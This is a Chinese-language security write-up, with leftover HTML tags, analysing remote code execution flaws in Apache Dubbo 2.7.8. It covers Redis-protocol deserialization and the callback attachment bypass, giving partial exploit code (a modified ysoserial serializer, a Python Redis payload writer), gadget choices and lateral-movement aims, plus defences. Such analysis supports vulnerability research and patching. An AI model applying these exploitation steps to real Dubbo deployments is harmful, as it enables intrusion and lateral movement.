Dubbo 2.7.8 远程代码执行漏洞分析与利用<\/h1>

1. Dubbo 简介<\/h2>

Apache Dubbo 是一个基于 Java 的高性能 RPC 框架，主要用于实现分布式服务调用。它支持多种协议，包括：<\/p>

Dubbo 协议（默认）<\/li>
HTTP 协议<\/li>
Redis 协议<\/li>

其他协议<\/li> <\/ul>

2. 历史漏洞回顾<\/h2>

2.1 CVE-2019-17564<\/h3>
漏洞描述<\/strong>：
当使用 HTTP 协议通信时，Dubbo 会接受来自消费者的 POST 请求并执行反序列化操作，由于缺乏安全校验，可导致任意代码执行。<\/p>
影响版本<\/strong>：
Dubbo 使用 HTTP 协议的版本<\/p>
修复方案<\/strong>：
将 POST 请求体的 handler 由"Java 原生反序列化"改为"JsonRpcServer"<\/p>

2.2 CVE-2020-1948<\/h3>
漏洞描述<\/strong>：
Dubbo 2.7.6 及以下版本默认反序列化方式存在代码执行漏洞，攻击者可发送未经验证的服务名或方法名的 RPC 请求，配合恶意参数负载实现 RCE。<\/p>
影响版本<\/strong>：
Dubbo ≤ 2.7.6<\/p>
修复方案<\/strong>：
增加 getInvocationWithoutData<\/code> 方法对恶意的 inv 对象进行置空操作<\/p>
3. Redis 协议远程代码执行漏洞<\/h2> 3.1 漏洞原理<\/h3> Dubbo 的 Redis 协议实现中，在处理 set 方法时，将 key 的内容作为字节流读取并进行反序列化处理，使用的是 JavaObjectInput<\/code>（对 ObjectInputStream<\/code> 的封装），没有进行任何过滤。<\/p> 关键代码路径<\/strong>： org.apache.dubbo.rpc.protocol.redis.RedisProtocol<\/code><\/p> 3.2 漏洞利用条件<\/h3> 攻击者能够控制 Redis 服务器<\/li> 目标系统使用 Dubbo 的 Redis 协议<\/li> 目标系统依赖可被利用的第三方库（如 CommonsCollections）<\/li> <\/ol> 3.3 漏洞利用步骤<\/h3> 构造恶意序列化 payload：<\/p> 使用 ysoserial 生成 CommonsCollections4 的 payload<\/li> 需要修改 ysoserial 使其在序列化对象前写入一个字节的 1<\/li> <\/ul> public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>final<\/span> Object obj,<\/span> final<\/span> OutputStream out)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> final<\/span> ObjectOutputStream objOut =<\/span> new<\/span> ObjectOutputStream(<\/span>out);<\/span> <\/span><\/span> objOut.<\/span>writeByte<\/span>(<\/span>1<\/span>);<\/span> \/\/ 绕过 Dubbo 的校验 <\/span><\/span><\/span><\/span> objOut.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 将 payload 写入 Redis：<\/p> import<\/span> redis,<\/span> binascii <\/span><\/span>r =<\/span> redis.<\/span>StrictRedis(host=<\/span>'192.168.176.2'<\/span>, port=<\/span>6379<\/span>, db=<\/span>0<\/span>) <\/span><\/span>payload =<\/span> open('\/tmp\/payload'<\/span>, 'rb'<\/span>).<\/span>read() <\/span><\/span>r.<\/span>set('rebeyond'<\/span>, payload) <\/span><\/span><\/code><\/pre><\/li> 触发漏洞：<\/p> 通过 Consumer 调用 get 方法获取恶意 key<\/li> <\/ul> <\/li> <\/ol> 3.4 攻击场景<\/h3> 主要用于内网横向移动：<\/p> 攻击者控制内网 Redis 服务器<\/li> 批量获取 Dubbo client 主机的权限<\/li> <\/ol> 4. Callback 远程代码执行漏洞<\/h2> 4.1 漏洞原理<\/h3> Dubbo 的回调机制存在安全问题：<\/p> DubboProtocol<\/code> 类中无条件执行 logger.warn<\/code>（未检查 isWarnEnabled<\/code>）<\/li> inv<\/code> 对象未通过 getInvocationWithoutData<\/code> 方法进行清洗<\/li> 通过控制 inv.getObjectAttachments().get(IS_CALLBACK_SERVICE_INVOKE)<\/code> 的值可进入危险分支<\/li> <\/ol> 4.2 漏洞利用条件<\/h3> 能够控制 RPC 请求的 attachments<\/li> 能够构造特定的方法调用<\/li> <\/ol> 4.3 漏洞利用步骤<\/h3> 构造恶意请求：<\/p> 在 attachments 中添加 "_isCallBackServiceInvoke":"true"<\/code><\/li> 使用 EchoService<\/code> 的 $echo<\/code> 方法（接收 Object 参数）<\/li> <\/ul> <\/li> 构造 Gadget：<\/p> 使用 com.sun.rowset.JdbcRowSetImpl<\/code> 和 ToStringBean<\/code><\/li> <\/ul> <\/li> 发送恶意请求触发漏洞<\/p> <\/li> <\/ol> 4.4 关键代码路径<\/h3> 注入 attachments：<\/p> \/\/ org.apache.dubbo.rpc.protocol.dubbo.DecodeableRpcInvocation <\/span><\/span><\/span><\/span>if<\/span> (<\/span>args !=<\/span> null<\/span> &&<\/span> args.<\/span>length<\/span> ><\/span> 0<\/span>)<\/span> {<\/span> <\/span><\/span> for<\/span> (<\/span>int<\/span> i =<\/span> 0<\/span>;<\/span> i <<\/span> args.<\/span>length<\/span>;<\/span> i++)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>args[<\/span>i]<\/span> instanceof<\/span> Map)<\/span> {<\/span> <\/span><\/span> @SuppressWarnings<\/span>(<\/span>"unchecked"<\/span>)<\/span> <\/span><\/span> Map<<\/span>String,<\/span> Object><\/span> map =<\/span> (<\/span>Map<<\/span>String,<\/span> Object>)<\/span> args[<\/span>i];<\/span> <\/span><\/span> if<\/span> (<\/span>map !=<\/span> null<\/span> &&<\/span> map.<\/span>size<\/span>()<\/span> ><\/span> 0<\/span>)<\/span> {<\/span> <\/span><\/span> if<\/span> (<\/span>attachments ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> attachments =<\/span> new<\/span> HashMap<<\/span>String,<\/span> Object>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> attachments.<\/span>putAll<\/span>(<\/span>map);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 触发漏洞的分支：<\/p> \/\/ org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol <\/span><\/span><\/span><\/span>if<\/span> (<\/span>inv.<\/span>getObjectAttachments<\/span>()<\/span> !=<\/span> null<\/span> <\/span><\/span> &&<\/span> inv.<\/span>getObjectAttachments<\/span>().<\/span>containsKey<\/span>(<\/span>IS_CALLBACK_SERVICE_INVOKE)<\/span> <\/span><\/span> &&<\/span> Boolean.<\/span>TRUE<\/span>.<\/span>toString<\/span>().<\/span>equals<\/span>(<\/span>inv.<\/span>getObjectAttachments<\/span>().<\/span>get<\/span>(<\/span>IS_CALLBACK_SERVICE_INVOKE)))<\/span> {<\/span> <\/span><\/span> \/\/ 漏洞触发点 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 防御措施<\/h2> 升级到最新版本的 Dubbo<\/li> 限制 Dubbo 服务的网络访问<\/li> 避免使用不安全的协议（如 HTTP、Redis）<\/li> 实施严格的输入验证<\/li> 移除不必要的依赖（如 CommonsCollections）<\/li> <\/ol> 6. 参考链接<\/h2> Dubbo 官方文档<\/a><\/li> CVE-2019-17564 分析<\/a><\/li> <\/ol>